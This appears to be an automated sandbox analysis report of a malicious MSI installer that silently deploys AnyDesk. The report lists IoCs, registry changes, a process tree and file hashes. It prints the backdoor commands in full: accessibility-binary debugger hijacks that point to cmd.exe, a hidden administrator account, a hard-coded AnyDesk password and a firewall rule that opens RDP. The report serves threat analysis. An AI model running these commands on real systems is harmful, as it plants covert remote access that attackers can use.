Analysis
-
max time kernel
90s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system -
submitted
05-08-2022 16:21
Static task
static1
Behavioral task
behavioral1
Sample
1.msi
Resource
win7-20220718-en
Behavioral task
behavioral2
Sample
1.msi
Resource
win10v2004-20220721-en
General
-
Target
1.msi
-
Size
3.9MB
-
MD5
6cf5ad7a7d1b7bab0c62e246cf41a985
-
SHA1
b06a03adc550ead96534f5e723395c4e16bfdf44
-
SHA256
fb9f0bf2b71bf576053c56cb913ea4e93581fc9d3aa9d6d8a0ae572a1622f050
-
SHA512
46cd8bd1ead75a8adb7d5bff81a2fdc04567d462e965664f6f9f796237839f07f74d2201c3da8f7f37c9dfc45749ed88708db5a216d84f7ac146e5af58a8608e
Malware Config
Signatures
-
Executes dropped EXE 6 IoCs
Processes:
install.exeanydesk.exeAnyDesk.exeAnyDesk.exeAnyDesk.exeanydesk.exepid process 1604 install.exe 4960 anydesk.exe 2008 AnyDesk.exe 4936 AnyDesk.exe 4532 AnyDesk.exe 528 anydesk.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Sets file execution options in registry 2 TTPs 8 IoCs
Processes:
install.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe install.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "c:\\windows\\system32\\cmd.exe" install.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe install.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "c:\\windows\\system32\\cmd.exe" install.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe install.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe\Debugger = "c:\\windows\\system32\\cmd.exe" install.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe install.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe\Debugger = "c:\\windows\\system32\\cmd.exe" install.exe -
Loads dropped DLL 4 IoCs
Processes:
MsiExec.exeMsiExec.exepid process 4212 MsiExec.exe 4740 MsiExec.exe 4740 MsiExec.exe 4212 MsiExec.exe -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
ICACLS.EXEICACLS.EXEpid process 4384 ICACLS.EXE 3528 ICACLS.EXE -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Y: msiexec.exe -
Modifies WinLogon 2 TTPs 3 IoCs
Processes:
install.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList install.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts install.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\Administartor = "0" install.exe -
Drops file in System32 directory 1 IoCs
Processes:
install.exedescription ioc process File opened for modification C:\Windows\SysWOW64\log1.txt install.exe -
Drops file in Windows directory 14 IoCs
Processes:
msiexec.exeEXPAND.EXEdescription ioc process File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIDCC.tmp msiexec.exe File opened for modification C:\Windows\LOGS\DPX\setuperr.log EXPAND.EXE File opened for modification C:\Windows\Installer\MSIB7AB.tmp msiexec.exe File created C:\Windows\Installer\e570c18.msi msiexec.exe File opened for modification C:\Windows\Installer\e570c16.msi msiexec.exe File created C:\Windows\Installer\SourceHash{AC4583F8-6694-473E-BB77-32CDFC9BA940} msiexec.exe File opened for modification C:\Windows\Installer\MSIDBB.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI155F.tmp msiexec.exe File opened for modification C:\Windows\LOGS\DPX\setupact.log EXPAND.EXE File created C:\Windows\Installer\e570c16.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSIB6D0.tmp msiexec.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
vssvc.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000024aabe40d3e837210000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff00000000270101000008000024aabe400000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3f000000ffffffff00000000070001000068090024aabe40000000000000d0120000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000024aabe4000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000024aabe4000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Modifies data under HKEY_USERS 10 IoCs
Processes:
MsiExec.exemsiexec.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" MsiExec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\ForegroundLockTimeout = "200000" MsiExec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1f msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ MsiExec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" MsiExec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" MsiExec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\ForegroundLockTimeout = "0" MsiExec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" MsiExec.exe -
Modifies registry class 38 IoCs
Processes:
msiexec.exeanydesk.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\ProgramData\\AnyDesk\\AnyDesk.exe\",0" anydesk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open anydesk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk\\AnyDesk.exe\" \"%1\"" anydesk.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\Clients = 3a0000000000 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon\ = "AnyDesk.exe,0" anydesk.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\Assignment = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\AuthorizedLUAApp = "0" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\SourceList\Net msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open anydesk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell anydesk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\Language = "1033" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon anydesk.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\InstanceType = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell anydesk.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\AdvertiseFlags = "388" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\SourceList\Media\1 = ";" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command anydesk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk\\AnyDesk.exe\" --play \"%1\"" anydesk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\SourceList\Media msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\27DCDF205199E0345B6F51FFDC229E64\8F3854CA4966E374BB7723DCCFB99A04 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\SourceList\PackageName = "1.msi" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk anydesk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk anydesk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon anydesk.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\Version = "458752" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\8F3854CA4966E374BB7723DCCFB99A04\ProductFeature msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\ProductName = "Anydesk - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\PackageCode = "3FB72BC8CB959144EB519E3E5854F372" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\27DCDF205199E0345B6F51FFDC229E64 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\ = "URL:AnyDesk Protocol" anydesk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\URL Protocol anydesk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command anydesk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\8F3854CA4966E374BB7723DCCFB99A04 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8F3854CA4966E374BB7723DCCFB99A04\SourceList msiexec.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
msiexec.exeanydesk.exeAnyDesk.exeAnyDesk.exepid process 2228 msiexec.exe 2228 msiexec.exe 4960 anydesk.exe 4960 anydesk.exe 2008 AnyDesk.exe 2008 AnyDesk.exe 4532 AnyDesk.exe 4532 AnyDesk.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
msiexec.exemsiexec.exevssvc.exeinstall.exesrtasks.exedescription pid process Token: SeShutdownPrivilege 4680 msiexec.exe Token: SeIncreaseQuotaPrivilege 4680 msiexec.exe Token: SeSecurityPrivilege 2228 msiexec.exe Token: SeCreateTokenPrivilege 4680 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4680 msiexec.exe Token: SeLockMemoryPrivilege 4680 msiexec.exe Token: SeIncreaseQuotaPrivilege 4680 msiexec.exe Token: SeMachineAccountPrivilege 4680 msiexec.exe Token: SeTcbPrivilege 4680 msiexec.exe Token: SeSecurityPrivilege 4680 msiexec.exe Token: SeTakeOwnershipPrivilege 4680 msiexec.exe Token: SeLoadDriverPrivilege 4680 msiexec.exe Token: SeSystemProfilePrivilege 4680 msiexec.exe Token: SeSystemtimePrivilege 4680 msiexec.exe Token: SeProfSingleProcessPrivilege 4680 msiexec.exe Token: SeIncBasePriorityPrivilege 4680 msiexec.exe Token: SeCreatePagefilePrivilege 4680 msiexec.exe Token: SeCreatePermanentPrivilege 4680 msiexec.exe Token: SeBackupPrivilege 4680 msiexec.exe Token: SeRestorePrivilege 4680 msiexec.exe Token: SeShutdownPrivilege 4680 msiexec.exe Token: SeDebugPrivilege 4680 msiexec.exe Token: SeAuditPrivilege 4680 msiexec.exe Token: SeSystemEnvironmentPrivilege 4680 msiexec.exe Token: SeChangeNotifyPrivilege 4680 msiexec.exe Token: SeRemoteShutdownPrivilege 4680 msiexec.exe Token: SeUndockPrivilege 4680 msiexec.exe Token: SeSyncAgentPrivilege 4680 msiexec.exe Token: SeEnableDelegationPrivilege 4680 msiexec.exe Token: SeManageVolumePrivilege 4680 msiexec.exe Token: SeImpersonatePrivilege 4680 msiexec.exe Token: SeCreateGlobalPrivilege 4680 msiexec.exe Token: SeBackupPrivilege 5032 vssvc.exe Token: SeRestorePrivilege 5032 vssvc.exe Token: SeAuditPrivilege 5032 vssvc.exe Token: SeBackupPrivilege 2228 msiexec.exe Token: SeRestorePrivilege 2228 msiexec.exe Token: SeRestorePrivilege 2228 msiexec.exe Token: SeTakeOwnershipPrivilege 2228 msiexec.exe Token: SeRestorePrivilege 2228 msiexec.exe Token: SeTakeOwnershipPrivilege 2228 msiexec.exe Token: SeRestorePrivilege 2228 msiexec.exe Token: SeTakeOwnershipPrivilege 2228 msiexec.exe Token: SeRestorePrivilege 2228 msiexec.exe Token: SeTakeOwnershipPrivilege 2228 msiexec.exe Token: SeRemoteShutdownPrivilege 1604 install.exe Token: SeBackupPrivilege 4716 srtasks.exe Token: SeRestorePrivilege 4716 srtasks.exe Token: SeSecurityPrivilege 4716 srtasks.exe Token: SeTakeOwnershipPrivilege 4716 srtasks.exe Token: SeBackupPrivilege 4716 srtasks.exe Token: SeRestorePrivilege 4716 srtasks.exe Token: SeSecurityPrivilege 4716 srtasks.exe Token: SeTakeOwnershipPrivilege 4716 srtasks.exe Token: SeRestorePrivilege 2228 msiexec.exe Token: SeTakeOwnershipPrivilege 2228 msiexec.exe Token: SeRestorePrivilege 2228 msiexec.exe Token: SeTakeOwnershipPrivilege 2228 msiexec.exe Token: SeRestorePrivilege 2228 msiexec.exe Token: SeTakeOwnershipPrivilege 2228 msiexec.exe Token: SeRestorePrivilege 2228 msiexec.exe Token: SeTakeOwnershipPrivilege 2228 msiexec.exe Token: SeRestorePrivilege 2228 msiexec.exe Token: SeTakeOwnershipPrivilege 2228 msiexec.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
Processes:
msiexec.exeAnyDesk.exepid process 4680 msiexec.exe 4936 AnyDesk.exe 4936 AnyDesk.exe 4936 AnyDesk.exe 4680 msiexec.exe -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
AnyDesk.exepid process 4936 AnyDesk.exe 4936 AnyDesk.exe 4936 AnyDesk.exe -
Suspicious use of WriteProcessMemory 44 IoCs
Processes:
msiexec.exeMsiExec.exeinstall.execmd.execmd.exeMsiExec.exedescription pid process target process PID 2228 wrote to memory of 4716 2228 msiexec.exe srtasks.exe PID 2228 wrote to memory of 4716 2228 msiexec.exe srtasks.exe PID 2228 wrote to memory of 4212 2228 msiexec.exe MsiExec.exe PID 2228 wrote to memory of 4212 2228 msiexec.exe MsiExec.exe PID 2228 wrote to memory of 4212 2228 msiexec.exe MsiExec.exe PID 2228 wrote to memory of 4740 2228 msiexec.exe MsiExec.exe PID 2228 wrote to memory of 4740 2228 msiexec.exe MsiExec.exe PID 2228 wrote to memory of 4740 2228 msiexec.exe MsiExec.exe PID 4740 wrote to memory of 4384 4740 MsiExec.exe ICACLS.EXE PID 4740 wrote to memory of 4384 4740 MsiExec.exe ICACLS.EXE PID 4740 wrote to memory of 4384 4740 MsiExec.exe ICACLS.EXE PID 4740 wrote to memory of 5008 4740 MsiExec.exe EXPAND.EXE PID 4740 wrote to memory of 5008 4740 MsiExec.exe EXPAND.EXE PID 4740 wrote to memory of 5008 4740 MsiExec.exe EXPAND.EXE PID 4740 wrote to memory of 1604 4740 MsiExec.exe install.exe PID 4740 wrote to memory of 1604 4740 MsiExec.exe install.exe PID 4740 wrote to memory of 1604 4740 MsiExec.exe install.exe PID 1604 wrote to memory of 2596 1604 install.exe cmd.exe PID 1604 wrote to memory of 2596 1604 install.exe cmd.exe PID 1604 wrote to memory of 2596 1604 install.exe cmd.exe PID 2596 wrote to memory of 4960 2596 cmd.exe anydesk.exe PID 2596 wrote to memory of 4960 2596 cmd.exe anydesk.exe PID 2596 wrote to memory of 4960 2596 cmd.exe anydesk.exe PID 1604 wrote to memory of 3732 1604 install.exe cmd.exe PID 1604 wrote to memory of 3732 1604 install.exe cmd.exe PID 1604 wrote to memory of 3732 1604 install.exe cmd.exe PID 3732 wrote to memory of 1308 3732 cmd.exe cmd.exe PID 3732 wrote to memory of 1308 3732 cmd.exe cmd.exe PID 3732 wrote to memory of 1308 3732 cmd.exe cmd.exe PID 3732 wrote to memory of 4532 3732 cmd.exe AnyDesk.exe PID 3732 wrote to memory of 4532 3732 cmd.exe AnyDesk.exe PID 3732 wrote to memory of 4532 3732 cmd.exe AnyDesk.exe PID 1604 wrote to memory of 528 1604 install.exe anydesk.exe PID 1604 wrote to memory of 528 1604 install.exe anydesk.exe PID 1604 wrote to memory of 528 1604 install.exe anydesk.exe PID 1604 wrote to memory of 1288 1604 install.exe netsh.exe PID 1604 wrote to memory of 1288 1604 install.exe netsh.exe PID 1604 wrote to memory of 1288 1604 install.exe netsh.exe PID 4740 wrote to memory of 3528 4740 MsiExec.exe ICACLS.EXE PID 4740 wrote to memory of 3528 4740 MsiExec.exe ICACLS.EXE PID 4740 wrote to memory of 3528 4740 MsiExec.exe ICACLS.EXE PID 4212 wrote to memory of 2040 4212 MsiExec.exe cmd.exe PID 4212 wrote to memory of 2040 4212 MsiExec.exe cmd.exe PID 4212 wrote to memory of 2040 4212 MsiExec.exe cmd.exe
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\1.msi1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding F209592F75EACBCB8A295D511C0C2B322⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\Admin\AppData\Local\Temp\MW-ac13770f-0bfc-4cd2-b976-dfa460866caa\files"3⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D2CC458D3D4E53F0CCE4C0795C4D02B0 E Global\MSI00002⤵
- Loads dropped DLL
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\ICACLS.EXE"C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-ac13770f-0bfc-4cd2-b976-dfa460866caa\." /SETINTEGRITYLEVEL (CI)(OI)HIGH3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\EXPAND.EXE"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files3⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\MW-ac13770f-0bfc-4cd2-b976-dfa460866caa\files\install.exe"C:\Users\Admin\AppData\Local\Temp\MW-ac13770f-0bfc-4cd2-b976-dfa460866caa\files\install.exe"3⤵
- Executes dropped EXE
- Sets file execution options in registry
- Modifies WinLogon
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c c:\programdata\anydesk.exe --install C:\ProgramData\AnyDesk --silent4⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\programdata\anydesk.exec:\programdata\anydesk.exe --install C:\ProgramData\AnyDesk --silent5⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.execmd /c echo 31121985west|c:\programdata\anydesk\anydesk.exe --set-password4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo 31121985west"5⤵
-
\??\c:\programdata\anydesk\AnyDesk.exec:\programdata\anydesk\anydesk.exe --set-password5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
\??\c:\programdata\anydesk\anydesk.exe"c:\programdata\anydesk\anydesk.exe" --get-id4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="RDP" dir=in protocol=TCP localport=3389 action=allow4⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\ICACLS.EXE"C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-ac13770f-0bfc-4cd2-b976-dfa460866caa\." /SETINTEGRITYLEVEL (CI)(OI)LOW3⤵
- Modifies file permissions
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\AnyDesk\AnyDesk.exe"C:\ProgramData\AnyDesk\AnyDesk.exe" --service1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\ProgramData\AnyDesk\AnyDesk.exe"C:\ProgramData\AnyDesk\AnyDesk.exe" --control1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\AnyDesk\AnyDesk.exeFilesize
3.7MB
MD51bc5890c9e7bf54b7712e344b0af9d04
SHA178c9302c7a387a8d158f38d501784be9b8b2716d
SHA256af61905129f377f5934b3bbf787e8d2417901858bb028f40f02200e985ee62f6
SHA5127113888a8439ae5af1b260c40229f7ebb98bdece52ebab0ce97137933af4e9777d92d68166dbcf87a95cf88615452cae7ecdf555b4785fffe63c5783dbcb595d
-
C:\ProgramData\AnyDesk\service.confFilesize
2KB
MD5b31412d2595ea971fb79cd9e96c38400
SHA1e202be33683d8de3448eed8becb6df3d64093599
SHA256a7811761591e1e8da762becfe453aa8f1e043d3f3e661690aec2fa6284cca2c5
SHA51243fe9d4c63fb274ccad196de92af0b461f9c6888f7a025668816de95bedf624bf89cef07a4d04061c51be821f332055f466ebb84cb25d073794a9cefeb6a4350
-
C:\ProgramData\AnyDesk\service.confFilesize
2KB
MD53c2411ee7e32c635ef1e1a3e77b68a22
SHA1d35201685f35f57398d67d93429a536f4f617fba
SHA256d5744fb7fb22e203623153254ca2e4daab0e53a9317ef411d5f0327cb6ca4ab4
SHA512407af5d9460d784bd3f24073c6ecf2b421bb025e33997f7dfdf3176693ed4333d752e72be2af3d80942d882cc000889ce2c981ef5ba8f57c05f1cc2e21f84bbf
-
C:\ProgramData\AnyDesk\system.confFilesize
343B
MD5bb8dfbe76d0dad2cd06d92c3257d60d2
SHA19232db6138b537ac13eb965c81dbdac2ed47ff83
SHA256259b8c034d7ca61612db50e6274c411f742bfc433bb86754bdb00e987eee2b3a
SHA5120e2e11461ce1db309c90e7dad14032714cbb8ba636ec6fbeb0fe5bf596c0d949a4df1513947740aeeac10bf91562e552c8cf54bf50c159c48d143ff17e365ebf
-
C:\ProgramData\AnyDesk\system.confFilesize
810B
MD54075f0e04bffeba05058d8e2a7f8e30c
SHA19fc55f6886f19fca7023fb8d65e0708ff0edf696
SHA256baa719f4cab511c4ef34d3e4bf680839719ec4dd3752fcfe5b4c90d923d1906c
SHA512dd05ae1bea9ad7386b504ec40f95197cfea5b549925020918375f37f9c36de380e02e2ae0dbb332173e97e6b22ad19dbcb6b02f0e17c6b70103baf4dc1184ae6
-
C:\ProgramData\AnyDesk\system.confFilesize
1019B
MD5fc914a23f6350ce39a6409bad04a75a9
SHA1457f9fe457da77448012210d12ecbf4a8982f091
